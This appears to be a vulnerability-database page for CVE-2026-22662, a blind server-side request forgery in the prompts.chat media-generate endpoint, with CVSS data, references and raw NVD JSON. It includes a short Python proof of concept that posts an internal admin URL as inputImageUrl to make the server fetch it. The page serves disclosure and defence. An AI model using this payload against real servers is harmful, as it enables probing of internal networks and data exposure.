CVE-2026-22662

Description

prompts.chat prior to commit 1464475 contains a blind server-side request forgery vulnerability in the Wiro media generator that allows authenticated users to perform server-side fetches of user-controlled inputImageUrl parameters. Attackers can exploit this vulnerability by sending POST requests to the /api/media-generate endpoint to probe internal networks, access internal services, and exfiltrate data through the upstream Wiro service without receiving direct response bodies.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:fka:prompts.chat:*:*:*:*:*:*:*:* - VULNERABLE

prompts.chat < commit 1464475

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target = "http://victim.com/api/media-generate"
internal_url = "http://127.0.0.1:8080/admin"
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <attacker_token>"
}
data = {"inputImageUrl": internal_url}

# Send blind SSRF payload
r = requests.post(target, json=data, headers=headers)
print(f"Request sent with status: {r.status_code}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22662
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22662
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22662/
[4] VulDB https://vuldb.com/cve/CVE-2026-22662
[5] https://github.com/f/prompts.chat/commit/1464475df2698fb7ccd0cdbc382b0750466f891d
[6] https://github.com/f/prompts.chat/pull/1102
[7] https://www.vulncheck.com/advisories/prompts-chat-blind-ssrf-via-media-generate

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22662", "sourceIdentifier": "[email protected]", "published": "2026-04-03T21:17:09.163", "lastModified": "2026-04-13T18:18:49.627", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "prompts.chat prior to commit 1464475 contains a blind server-side request forgery vulnerability in the Wiro media generator that allows authenticated users to perform server-side fetches of user-controlled inputImageUrl parameters. Attackers can exploit this vulnerability by sending POST requests to the /api/media-generate endpoint to probe internal networks, access internal services, and exfiltrate data through the upstream Wiro service without receiving direct response bodies."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fka:prompts.chat:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026-03-24", "matchCriteriaId": "CC79D2B7-A39B-46F9-8909-B1B54FE7C05F"}]}]}], "references": [{"url": "https://github.com/f/prompts.chat/commit/1464475df2698fb7ccd0cdbc382b0750466f891d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/f/prompts.chat/pull/1102", "source": "[email protected]", "tags": ["Issue Tracking", "Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/prompts-chat-blind-ssrf-via-media-generate", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}